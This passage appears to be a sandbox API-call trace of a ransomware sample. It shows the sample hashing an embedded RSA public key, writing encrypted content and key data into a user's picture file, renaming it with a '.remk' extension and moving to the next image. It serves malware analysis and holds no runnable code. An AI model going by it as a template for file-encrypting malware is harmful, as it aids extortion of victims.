KEY-----\\\\n") returned 497 [0232.841] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0232.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.841] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0232.841] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0232.842] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0232.842] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0232.842] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0232.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0232.842] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0232.842] GetLastError () returned 0x0 [0232.843] CryptDestroyHash (hHash=0x31de170) returned 1 [0232.843] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0232.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.843] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0232.843] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.843] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0232.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xca70) returned 0x37c2278 [0232.843] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0232.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c21c0 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee250 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37c2208 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee268 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee298 [0232.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2b0 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0232.844] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x325d6d0 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2b0 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee298 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0232.844] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0232.845] GetCurrentThreadId () returned 0x314 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37b9500 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.845] GetCurrentThreadId () returned 0x314 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0232.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.845] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2f8 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee298 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2b0 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee280 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee310 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2e0 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee2c8 [0232.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee328 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee2c8 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2e0 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee298 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2f8 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee328 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325d6d0 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee298 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d8e8 [0232.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0232.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8e8 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2c8 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee310 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee2b0 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee280 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee268 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2208 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0232.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0232.849] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0xca6e, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0xca6e, lpOverlapped=0x0) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0232.849] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xca73, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.849] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0232.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0232.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0232.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0232.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0232.849] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0232.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0232.849] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0232.849] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0232.850] CloseHandle (hObject=0x640) returned 1 [0232.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0232.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x37b5b70 [0232.854] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0232.854] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LsuBcnzVDaw5Lq.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lsubcnzvdaw5lq.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LsuBcnzVDaw5Lq.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lsubcnzvdaw5lq.jpg.remk")) returned 1 [0232.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0232.855] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.855] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0232.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0232.857] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b6d5ff0, ftCreationTime.dwHighDateTime=0x1d5dd53, ftLastAccessTime.dwLowDateTime=0x3e177260, ftLastAccessTime.dwHighDateTime=0x1d5e18d, ftLastWriteTime.dwLowDateTime=0x3e177260, ftLastWriteTime.dwHighDateTime=0x1d5e18d, nFileSizeHigh=0x0, nFileSizeLow=0xfc08, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uNclF6hauoNOJdN8.png", cAlternateFileName="UNCLF6~1.PNG")) returned 1 [0232.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5968 [0232.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0232.857] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0232.857] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uNclF6hauoNOJdN8.png") returned=".png" [0232.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\uNclF6hauoNOJdN8.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\unclf6hauonojdn8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0232.857] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=64520) returned 1 [0232.857] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0232.860] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xfbe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0232.860] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0232.864] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0232.864] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0232.864] 